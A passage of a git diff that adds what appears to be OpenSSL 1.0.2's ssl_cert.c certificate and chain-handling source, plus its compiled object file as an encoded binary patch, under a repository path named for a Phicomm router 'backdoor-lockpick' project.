+#endif
+#ifndef OPENSSL_NO_RSA
+    if (ret->rsa_tmp != NULL)
+        RSA_free(ret->rsa_tmp);
+#endif
+#ifndef OPENSSL_NO_DH
+    if (ret->dh_tmp != NULL)
+        DH_free(ret->dh_tmp);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if (ret->ecdh_tmp != NULL)
+        EC_KEY_free(ret->ecdh_tmp);
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+    custom_exts_free(&ret->cli_ext);
+    custom_exts_free(&ret->srv_ext);
+#endif
+
+    ssl_cert_clear_certs(ret);
+
+    return NULL;
+}
+
+/* Free up and clear all certificates and chains */
+
+void ssl_cert_clear_certs(CERT *c)
+{
+    int i;
+    if (c == NULL)
+        return;
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        CERT_PKEY *cpk = c->pkeys + i;
+        if (cpk->x509) {
+            X509_free(cpk->x509);
+            cpk->x509 = NULL;
+        }
+        if (cpk->privatekey) {
+            EVP_PKEY_free(cpk->privatekey);
+            cpk->privatekey = NULL;
+        }
+        if (cpk->chain) {
+            sk_X509_pop_free(cpk->chain, X509_free);
+            cpk->chain = NULL;
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        if (cpk->serverinfo) {
+            OPENSSL_free(cpk->serverinfo);
+            cpk->serverinfo = NULL;
+            cpk->serverinfo_length = 0;
+        }
+#endif
+        /* Clear all flags apart from explicit sign */
+        cpk->valid_flags &= CERT_PKEY_EXPLICIT_SIGN;
+    }
+}
+
+void ssl_cert_free(CERT *c)
+{
+    int i;
+
+    if (c == NULL)
+        return;
+
+    i = CRYPTO_add(&c->references, -1, CRYPTO_LOCK_SSL_CERT);
+#ifdef REF_PRINT
+    REF_PRINT("CERT", c);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "ssl_cert_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+#ifndef OPENSSL_NO_RSA
+    if (c->rsa_tmp)
+        RSA_free(c->rsa_tmp);
+#endif
+#ifndef OPENSSL_NO_DH
+    if (c->dh_tmp)
+        DH_free(c->dh_tmp);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if (c->ecdh_tmp)
+        EC_KEY_free(c->ecdh_tmp);
+#endif
+
+    ssl_cert_clear_certs(c);
+    if (c->peer_sigalgs)
+        OPENSSL_free(c->peer_sigalgs);
+    if (c->conf_sigalgs)
+        OPENSSL_free(c->conf_sigalgs);
+    if (c->client_sigalgs)
+        OPENSSL_free(c->client_sigalgs);
+    if (c->shared_sigalgs)
+        OPENSSL_free(c->shared_sigalgs);
+    if (c->ctypes)
+        OPENSSL_free(c->ctypes);
+    if (c->verify_store)
+        X509_STORE_free(c->verify_store);
+    if (c->chain_store)
+        X509_STORE_free(c->chain_store);
+    if (c->ciphers_raw)
+        OPENSSL_free(c->ciphers_raw);
+#ifndef OPENSSL_NO_TLSEXT
+    custom_exts_free(&c->cli_ext);
+    custom_exts_free(&c->srv_ext);
+#endif
+    OPENSSL_free(c);
+}
+
+int ssl_cert_inst(CERT **o)
+{
+    /*
+     * Create a CERT if there isn't already one (which cannot really happen,
+     * as it is initially created in SSL_CTX_new; but the earlier code
+     * usually allows for that one being non-existant, so we follow that
+     * behaviour, as it might turn out that there actually is a reason for it
+     * -- but I'm not sure that *all* of the existing code could cope with
+     * s->cert being NULL, otherwise we could do without the initialization
+     * in SSL_CTX_new).
+     */
+
+    if (o == NULL) {
+        SSLerr(SSL_F_SSL_CERT_INST, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (*o == NULL) {
+        if ((*o = ssl_cert_new()) == NULL) {
+            SSLerr(SSL_F_SSL_CERT_INST, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+    }
+    return (1);
+}
+
+int ssl_cert_set0_chain(CERT *c, STACK_OF(X509) *chain)
+{
+    CERT_PKEY *cpk = c->key;
+    if (!cpk)
+        return 0;
+    if (cpk->chain)
+        sk_X509_pop_free(cpk->chain, X509_free);
+    cpk->chain = chain;
+    return 1;
+}
+
+int ssl_cert_set1_chain(CERT *c, STACK_OF(X509) *chain)
+{
+    STACK_OF(X509) *dchain;
+    if (!chain)
+        return ssl_cert_set0_chain(c, NULL);
+    dchain = X509_chain_up_ref(chain);
+    if (!dchain)
+        return 0;
+    if (!ssl_cert_set0_chain(c, dchain)) {
+        sk_X509_pop_free(dchain, X509_free);
+        return 0;
+    }
+    return 1;
+}
+
+int ssl_cert_add0_chain_cert(CERT *c, X509 *x)
+{
+    CERT_PKEY *cpk = c->key;
+    if (!cpk)
+        return 0;
+    if (!cpk->chain)
+        cpk->chain = sk_X509_new_null();
+    if (!cpk->chain || !sk_X509_push(cpk->chain, x))
+        return 0;
+    return 1;
+}
+
+int ssl_cert_add1_chain_cert(CERT *c, X509 *x)
+{
+    if (!ssl_cert_add0_chain_cert(c, x))
+        return 0;
+    CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+    return 1;
+}
+
+int ssl_cert_select_current(CERT *c, X509 *x)
+{
+    int i;
+    if (x == NULL)
+        return 0;
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        CERT_PKEY *cpk = c->pkeys + i;
+        if (cpk->x509 == x && cpk->privatekey) {
+            c->key = cpk;
+            return 1;
+        }
+    }
+
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        CERT_PKEY *cpk = c->pkeys + i;
+        if (cpk->privatekey && cpk->x509 && !X509_cmp(cpk->x509, x)) {
+            c->key = cpk;
+            return 1;
+        }
+    }
+    return 0;
+}
+
+int ssl_cert_set_current(CERT *c, long op)
+{
+    int i, idx;
+    if (!c)
+        return 0;
+    if (op == SSL_CERT_SET_FIRST)
+        idx = 0;
+    else if (op == SSL_CERT_SET_NEXT) {
+        idx = (int)(c->key - c->pkeys + 1);
+        if (idx >= SSL_PKEY_NUM)
+            return 0;
+    } else
+        return 0;
+    for (i = idx; i < SSL_PKEY_NUM; i++) {
+        CERT_PKEY *cpk = c->pkeys + i;
+        if (cpk->x509 && cpk->privatekey) {
+            c->key = cpk;
+            return 1;
+        }
+    }
+    return 0;
+}
+
+void ssl_cert_set_cert_cb(CERT *c, int (*cb) (SSL *ssl, void *arg), void *arg)
+{
+    c->cert_cb = cb;
+    c->cert_cb_arg = arg;
+}
+
+SESS_CERT *ssl_sess_cert_new(void)
+{
+    SESS_CERT *ret;
+
+    ret = OPENSSL_malloc(sizeof *ret);
+    if (ret == NULL) {
+        SSLerr(SSL_F_SSL_SESS_CERT_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    memset(ret, 0, sizeof *ret);
+    ret->peer_key = &(ret->peer_pkeys[SSL_PKEY_RSA_ENC]);
+    ret->references = 1;
+
+    return ret;
+}
+
+void ssl_sess_cert_free(SESS_CERT *sc)
+{
+    int i;
+
+    if (sc == NULL)
+        return;
+
+    i = CRYPTO_add(&sc->references, -1, CRYPTO_LOCK_SSL_SESS_CERT);
+#ifdef REF_PRINT
+    REF_PRINT("SESS_CERT", sc);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "ssl_sess_cert_free, bad reference count\n");
+        abort();                /* ok */
+    }
+#endif
+
+    /* i == 0 */
+    if (sc->cert_chain != NULL)
+        sk_X509_pop_free(sc->cert_chain, X509_free);
+    for (i = 0; i < SSL_PKEY_NUM; i++) {
+        if (sc->peer_pkeys[i].x509 != NULL)
+            X509_free(sc->peer_pkeys[i].x509);
+#if 0                           /* We don't have the peer's private key.
+                                 * These lines are just * here as a reminder
+                                 * that we're still using a
+                                 * not-quite-appropriate * data structure. */
+        if (sc->peer_pkeys[i].privatekey != NULL)
+            EVP_PKEY_free(sc->peer_pkeys[i].privatekey);
+#endif
+    }
+
+#ifndef OPENSSL_NO_RSA
+    if (sc->peer_rsa_tmp != NULL)
+        RSA_free(sc->peer_rsa_tmp);
+#endif
+#ifndef OPENSSL_NO_DH
+    if (sc->peer_dh_tmp != NULL)
+        DH_free(sc->peer_dh_tmp);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if (sc->peer_ecdh_tmp != NULL)
+        EC_KEY_free(sc->peer_ecdh_tmp);
+#endif
+
+    OPENSSL_free(sc);
+}
+
+int ssl_set_peer_cert_type(SESS_CERT *sc, int type)
+{
+    sc->peer_cert_type = type;
+    return (1);
+}
+
+int ssl_verify_cert_chain(SSL *s, STACK_OF(X509) *sk)
+{
+    X509 *x;
+    int i;
+    X509_STORE *verify_store;
+    X509_STORE_CTX ctx;
+
+    if (s->cert->verify_store)
+        verify_store = s->cert->verify_store;
+    else
+        verify_store = s->ctx->cert_store;
+
+    if ((sk == NULL) || (sk_X509_num(sk) == 0))
+        return (0);
+
+    x = sk_X509_value(sk, 0);
+    if (!X509_STORE_CTX_init(&ctx, verify_store, x, sk)) {
+        SSLerr(SSL_F_SSL_VERIFY_CERT_CHAIN, ERR_R_X509_LIB);
+        return (0);
+    }
+    /* Set suite B flags if needed */
+    X509_STORE_CTX_set_flags(&ctx, tls1_suiteb(s));
+#if 0
+    if (SSL_get_verify_depth(s) >= 0)
+        X509_STORE_CTX_set_depth(&ctx, SSL_get_verify_depth(s));
+#endif
+    X509_STORE_CTX_set_ex_data(&ctx, SSL_get_ex_data_X509_STORE_CTX_idx(), s);
+
+    /*
+     * We need to inherit the verify parameters. These can be determined by
+     * the context: if its a server it will verify SSL client certificates or
+     * vice versa.
+     */
+
+    X509_STORE_CTX_set_default(&ctx, s->server ? "ssl_client" : "ssl_server");
+    /*
+     * Anything non-default in "param" should overwrite anything in the ctx.
+     */
+    X509_VERIFY_PARAM_set1(X509_STORE_CTX_get0_param(&ctx), s->param);
+
+    if (s->verify_callback)
+        X509_STORE_CTX_set_verify_cb(&ctx, s->verify_callback);
+
+    if (s->ctx->app_verify_callback != NULL)
+#if 1                           /* new with OpenSSL 0.9.7 */
+        i = s->ctx->app_verify_callback(&ctx, s->ctx->app_verify_arg);
+#else
+        i = s->ctx->app_verify_callback(&ctx); /* should pass app_verify_arg */
+#endif
+    else {
+#ifndef OPENSSL_NO_X509_VERIFY
+        i = X509_verify_cert(&ctx);
+#else
+        i = 0;
+        ctx.error = X509_V_ERR_APPLICATION_VERIFICATION;
+        SSLerr(SSL_F_SSL_VERIFY_CERT_CHAIN, SSL_R_NO_VERIFY_CALLBACK);
+#endif
+    }
+
+    s->verify_result = ctx.error;
+    X509_STORE_CTX_cleanup(&ctx);
+
+    return (i);
+}
+
+static void set_client_CA_list(STACK_OF(X509_NAME) **ca_list,
+                               STACK_OF(X509_NAME) *name_list)
+{
+    if (*ca_list != NULL)
+        sk_X509_NAME_pop_free(*ca_list, X509_NAME_free);
+
+    *ca_list = name_list;
+}
+
+STACK_OF(X509_NAME) *SSL_dup_CA_list(STACK_OF(X509_NAME) *sk)
+{
+    int i;
+    STACK_OF(X509_NAME) *ret;
+    X509_NAME *name;
+
+    ret = sk_X509_NAME_new_null();
+    for (i = 0; i < sk_X509_NAME_num(sk); i++) {
+        name = X509_NAME_dup(sk_X509_NAME_value(sk, i));
+        if ((name == NULL) || !sk_X509_NAME_push(ret, name)) {
+            sk_X509_NAME_pop_free(ret, X509_NAME_free);
+            return (NULL);
+        }
+    }
+    return (ret);
+}
+
+void SSL_set_client_CA_list(SSL *s, STACK_OF(X509_NAME) *name_list)
+{
+    set_client_CA_list(&(s->client_CA), name_list);
+}
+
+void SSL_CTX_set_client_CA_list(SSL_CTX *ctx, STACK_OF(X509_NAME) *name_list)
+{
+    set_client_CA_list(&(ctx->client_CA), name_list);
+}
+
+STACK_OF(X509_NAME) *SSL_CTX_get_client_CA_list(const SSL_CTX *ctx)
+{
+    return (ctx->client_CA);
+}
+
+STACK_OF(X509_NAME) *SSL_get_client_CA_list(const SSL *s)
+{
+    if (s->type == SSL_ST_CONNECT) { /* we are in the client */
+        if (((s->version >> 8) == SSL3_VERSION_MAJOR) && (s->s3 != NULL))
+            return (s->s3->tmp.ca_names);
+        else
+            return (NULL);
+    } else {
+        if (s->client_CA != NULL)
+            return (s->client_CA);
+        else
+            return (s->ctx->client_CA);
+    }
+}
+
+static int add_client_CA(STACK_OF(X509_NAME) **sk, X509 *x)
+{
+    X509_NAME *name;
+
+    if (x == NULL)
+        return (0);
+    if ((*sk == NULL) && ((*sk = sk_X509_NAME_new_null()) == NULL))
+        return (0);
+
+    if ((name = X509_NAME_dup(X509_get_subject_name(x))) == NULL)
+        return (0);
+
+    if (!sk_X509_NAME_push(*sk, name)) {
+        X509_NAME_free(name);
+        return (0);
+    }
+    return (1);
+}
+
+int SSL_add_client_CA(SSL *ssl, X509 *x)
+{
+    return (add_client_CA(&(ssl->client_CA), x));
+}
+
+int SSL_CTX_add_client_CA(SSL_CTX *ctx, X509 *x)
+{
+    return (add_client_CA(&(ctx->client_CA), x));
+}
+
+static int xname_cmp(const X509_NAME *const *a, const X509_NAME *const *b)
+{
+    return (X509_NAME_cmp(*a, *b));
+}
+
+#ifndef OPENSSL_NO_STDIO
+/**
+ * Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;
+ * it doesn't really have anything to do with clients (except that a common use
+ * for a stack of CAs is to send it to the client). Actually, it doesn't have
+ * much to do with CAs, either, since it will load any old cert.
+ * \param file the file containing one or more certs.
+ * \return a ::STACK containing the certs.
+ */
+STACK_OF(X509_NAME) *SSL_load_client_CA_file(const char *file)
+{
+    BIO *in;
+    X509 *x = NULL;
+    X509_NAME *xn = NULL;
+    STACK_OF(X509_NAME) *ret = NULL, *sk;
+
+    sk = sk_X509_NAME_new(xname_cmp);
+
+    in = BIO_new(BIO_s_file_internal());
+
+    if ((sk == NULL) || (in == NULL)) {
+        SSLerr(SSL_F_SSL_LOAD_CLIENT_CA_FILE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!BIO_read_filename(in, file))
+        goto err;
+
+    for (;;) {
+        if (PEM_read_bio_X509(in, &x, NULL, NULL) == NULL)
+            break;
+        if (ret == NULL) {
+            ret = sk_X509_NAME_new_null();
+            if (ret == NULL) {
+                SSLerr(SSL_F_SSL_LOAD_CLIENT_CA_FILE, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+        if ((xn = X509_get_subject_name(x)) == NULL)
+            goto err;
+        /* check for duplicates */
+        xn = X509_NAME_dup(xn);
+        if (xn == NULL)
+            goto err;
+        if (sk_X509_NAME_find(sk, xn) >= 0)
+            X509_NAME_free(xn);
+        else {
+            sk_X509_NAME_push(sk, xn);
+            sk_X509_NAME_push(ret, xn);
+        }
+    }
+
+    if (0) {
+ err:
+        if (ret != NULL)
+            sk_X509_NAME_pop_free(ret, X509_NAME_free);
+        ret = NULL;
+    }
+    if (sk != NULL)
+        sk_X509_NAME_free(sk);
+    if (in != NULL)
+        BIO_free(in);
+    if (x != NULL)
+        X509_free(x);
+    if (ret != NULL)
+        ERR_clear_error();
+    return (ret);
+}
+#endif
+
+/**
+ * Add a file of certs to a stack.
+ * \param stack the stack to add to.
+ * \param file the file to add from. All certs in this file that are not
+ * already in the stack will be added.
+ * \return 1 for success, 0 for failure. Note that in the case of failure some
+ * certs may have been added to \c stack.
+ */
+
+int SSL_add_file_cert_subjects_to_stack(STACK_OF(X509_NAME) *stack,
+                                        const char *file)
+{
+    BIO *in;
+    X509 *x = NULL;
+    X509_NAME *xn = NULL;
+    int ret = 1;
+    int (*oldcmp) (const X509_NAME *const *a, const X509_NAME *const *b);
+
+    oldcmp = sk_X509_NAME_set_cmp_func(stack, xname_cmp);
+
+    in = BIO_new(BIO_s_file_internal());
+
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_ADD_FILE_CERT_SUBJECTS_TO_STACK,
+               ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!BIO_read_filename(in, file))
+        goto err;
+
+    for (;;) {
+        if (PEM_read_bio_X509(in, &x, NULL, NULL) == NULL)
+            break;
+        if ((xn = X509_get_subject_name(x)) == NULL)
+            goto err;
+        xn = X509_NAME_dup(xn);
+        if (xn == NULL)
+            goto err;
+        if (sk_X509_NAME_find(stack, xn) >= 0)
+            X509_NAME_free(xn);
+        else
+            sk_X509_NAME_push(stack, xn);
+    }
+
+    ERR_clear_error();
+
+    if (0) {
+ err:
+        ret = 0;
+    }
+    if (in != NULL)
+        BIO_free(in);
+    if (x != NULL)
+        X509_free(x);
+
+    (void)sk_X509_NAME_set_cmp_func(stack, oldcmp);
+
+    return ret;
+}
+
+/**
+ * Add a directory of certs to a stack.
+ * \param stack the stack to append to.
+ * \param dir the directory to append from. All files in this directory will be
+ * examined as potential certs. Any that are acceptable to
+ * SSL_add_dir_cert_subjects_to_stack() that are not already in the stack will be
+ * included.
+ * \return 1 for success, 0 for failure. Note that in the case of failure some
+ * certs may have been added to \c stack.
+ */
+
+int SSL_add_dir_cert_subjects_to_stack(STACK_OF(X509_NAME) *stack,
+                                       const char *dir)
+{
+    OPENSSL_DIR_CTX *d = NULL;
+    const char *filename;
+    int ret = 0;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_READDIR);
+
+    /* Note that a side effect is that the CAs will be sorted by name */
+
+    while ((filename = OPENSSL_DIR_read(&d, dir))) {
+        char buf[1024];
+        int r;
+
+        if (strlen(dir) + strlen(filename) + 2 > sizeof buf) {
+            SSLerr(SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK,
+                   SSL_R_PATH_TOO_LONG);
+            goto err;
+        }
+#ifdef OPENSSL_SYS_VMS
+        r = BIO_snprintf(buf, sizeof buf, "%s%s", dir, filename);
+#else
+        r = BIO_snprintf(buf, sizeof buf, "%s/%s", dir, filename);
+#endif
+        if (r <= 0 || r >= (int)sizeof(buf))
+            goto err;
+        if (!SSL_add_file_cert_subjects_to_stack(stack, buf))
+            goto err;
+    }
+
+    if (errno) {
+        SYSerr(SYS_F_OPENDIR, get_last_sys_error());
+        ERR_add_error_data(3, "OPENSSL_DIR_read(&ctx, '", dir, "')");
+        SSLerr(SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK, ERR_R_SYS_LIB);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    if (d)
+        OPENSSL_DIR_end(&d);
+    CRYPTO_w_unlock(CRYPTO_LOCK_READDIR);
+    return ret;
+}
+
+/* Add a certificate to a BUF_MEM structure */
+
+static int ssl_add_cert_to_buf(BUF_MEM *buf, unsigned long *l, X509 *x)
+{
+    int n;
+    unsigned char *p;
+
+    n = i2d_X509(x, NULL);
+    if (!BUF_MEM_grow_clean(buf, (int)(n + (*l) + 3))) {
+        SSLerr(SSL_F_SSL_ADD_CERT_TO_BUF, ERR_R_BUF_LIB);
+        return 0;
+    }
+    p = (unsigned char *)&(buf->data[*l]);
+    l2n3(n, p);
+    i2d_X509(x, &p);
+    *l += n + 3;
+
+    return 1;
+}
+
+/* Add certificate chain to internal SSL BUF_MEM strcuture */
+int ssl_add_cert_chain(SSL *s, CERT_PKEY *cpk, unsigned long *l)
+{
+    BUF_MEM *buf = s->init_buf;
+    int no_chain;
+    int i;
+
+    X509 *x;
+    STACK_OF(X509) *extra_certs;
+    X509_STORE *chain_store;
+
+    if (cpk)
+        x = cpk->x509;
+    else
+        x = NULL;
+
+    if (s->cert->chain_store)
+        chain_store = s->cert->chain_store;
+    else
+        chain_store = s->ctx->cert_store;
+
+    /*
+     * If we have a certificate specific chain use it, else use parent ctx.
+     */
+    if (cpk && cpk->chain)
+        extra_certs = cpk->chain;
+    else
+        extra_certs = s->ctx->extra_certs;
+
+    if ((s->mode & SSL_MODE_NO_AUTO_CHAIN) || extra_certs)
+        no_chain = 1;
+    else
+        no_chain = 0;
+
+    /* TLSv1 sends a chain with nothing in it, instead of an alert */
+    if (!BUF_MEM_grow_clean(buf, 10)) {
+        SSLerr(SSL_F_SSL_ADD_CERT_CHAIN, ERR_R_BUF_LIB);
+        return 0;
+    }
+    if (x != NULL) {
+        if (no_chain) {
+            if (!ssl_add_cert_to_buf(buf, l, x))
+                return 0;
+        } else {
+            X509_STORE_CTX xs_ctx;
+
+            if (!X509_STORE_CTX_init(&xs_ctx, chain_store, x, NULL)) {
+                SSLerr(SSL_F_SSL_ADD_CERT_CHAIN, ERR_R_X509_LIB);
+                return (0);
+            }
+            X509_verify_cert(&xs_ctx);
+            /* Don't leave errors in the queue */
+            ERR_clear_error();
+            for (i = 0; i < sk_X509_num(xs_ctx.chain); i++) {
+                x = sk_X509_value(xs_ctx.chain, i);
+
+                if (!ssl_add_cert_to_buf(buf, l, x)) {
+                    X509_STORE_CTX_cleanup(&xs_ctx);
+                    return 0;
+                }
+            }
+            X509_STORE_CTX_cleanup(&xs_ctx);
+        }
+    }
+    for (i = 0; i < sk_X509_num(extra_certs); i++) {
+        x = sk_X509_value(extra_certs, i);
+        if (!ssl_add_cert_to_buf(buf, l, x))
+            return 0;
+    }
+
+    return 1;
+}
+
+/* Build a certificate chain for current certificate */
+int ssl_build_cert_chain(CERT *c, X509_STORE *chain_store, int flags)
+{
+    CERT_PKEY *cpk = c->key;
+    X509_STORE_CTX xs_ctx;
+    STACK_OF(X509) *chain = NULL, *untrusted = NULL;
+    X509 *x;
+    int i, rv = 0;
+    unsigned long error;
+
+    if (!cpk->x509) {
+        SSLerr(SSL_F_SSL_BUILD_CERT_CHAIN, SSL_R_NO_CERTIFICATE_SET);
+        goto err;
+    }
+    /* Rearranging and check the chain: add everything to a store */
+    if (flags & SSL_BUILD_CHAIN_FLAG_CHECK) {
+        chain_store = X509_STORE_new();
+        if (!chain_store)
+            goto err;
+        for (i = 0; i < sk_X509_num(cpk->chain); i++) {
+            x = sk_X509_value(cpk->chain, i);
+            if (!X509_STORE_add_cert(chain_store, x)) {
+                error = ERR_peek_last_error();
+                if (ERR_GET_LIB(error) != ERR_LIB_X509 ||
+                    ERR_GET_REASON(error) !=
+                    X509_R_CERT_ALREADY_IN_HASH_TABLE)
+                    goto err;
+                ERR_clear_error();
+            }
+        }
+        /* Add EE cert too: it might be self signed */
+        if (!X509_STORE_add_cert(chain_store, cpk->x509)) {
+            error = ERR_peek_last_error();
+            if (ERR_GET_LIB(error) != ERR_LIB_X509 ||
+                ERR_GET_REASON(error) != X509_R_CERT_ALREADY_IN_HASH_TABLE)
+                goto err;
+            ERR_clear_error();
+        }
+    } else {
+        if (c->chain_store)
+            chain_store = c->chain_store;
+
+        if (flags & SSL_BUILD_CHAIN_FLAG_UNTRUSTED)
+            untrusted = cpk->chain;
+    }
+
+    if (!X509_STORE_CTX_init(&xs_ctx, chain_store, cpk->x509, untrusted)) {
+        SSLerr(SSL_F_SSL_BUILD_CERT_CHAIN, ERR_R_X509_LIB);
+        goto err;
+    }
+    /* Set suite B flags if needed */
+    X509_STORE_CTX_set_flags(&xs_ctx,
+                             c->cert_flags & SSL_CERT_FLAG_SUITEB_128_LOS);
+
+    i = X509_verify_cert(&xs_ctx);
+    if (i <= 0 && flags & SSL_BUILD_CHAIN_FLAG_IGNORE_ERROR) {
+        if (flags & SSL_BUILD_CHAIN_FLAG_CLEAR_ERROR)
+            ERR_clear_error();
+        i = 1;
+        rv = 2;
+    }
+    if (i > 0)
+        chain = X509_STORE_CTX_get1_chain(&xs_ctx);
+    if (i <= 0) {
+        SSLerr(SSL_F_SSL_BUILD_CERT_CHAIN, SSL_R_CERTIFICATE_VERIFY_FAILED);
+        i = X509_STORE_CTX_get_error(&xs_ctx);
+        ERR_add_error_data(2, "Verify error:",
+                           X509_verify_cert_error_string(i));
+
+        X509_STORE_CTX_cleanup(&xs_ctx);
+        goto err;
+    }
+    X509_STORE_CTX_cleanup(&xs_ctx);
+    if (cpk->chain)
+        sk_X509_pop_free(cpk->chain, X509_free);
+    /* Remove EE certificate from chain */
+    x = sk_X509_shift(chain);
+    X509_free(x);
+    if (flags & SSL_BUILD_CHAIN_FLAG_NO_ROOT) {
+        if (sk_X509_num(chain) > 0) {
+            /* See if last cert is self signed */
+            x = sk_X509_value(chain, sk_X509_num(chain) - 1);
+            X509_check_purpose(x, -1, 0);
+            if (x->ex_flags & EXFLAG_SS) {
+                x = sk_X509_pop(chain);
+                X509_free(x);
+            }
+        }
+    }
+    cpk->chain = chain;
+    if (rv == 0)
+        rv = 1;
+ err:
+    if (flags & SSL_BUILD_CHAIN_FLAG_CHECK)
+        X509_STORE_free(chain_store);
+
+    return rv;
+}
+
+int ssl_cert_set_cert_store(CERT *c, X509_STORE *store, int chain, int ref)
+{
+    X509_STORE **pstore;
+    if (chain)
+        pstore = &c->chain_store;
+    else
+        pstore = &c->verify_store;
+    if (*pstore)
+        X509_STORE_free(*pstore);
+    *pstore = store;
+    if (ref && store)
+        CRYPTO_add(&store->references, 1, CRYPTO_LOCK_X509_STORE);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_cert.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_cert.o
new file mode 100644
index 0000000000000000000000000000000000000000..2ccd4b7d87383726bd74566d57861cbcef3afa7e
GIT binary patch
literal 20000
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
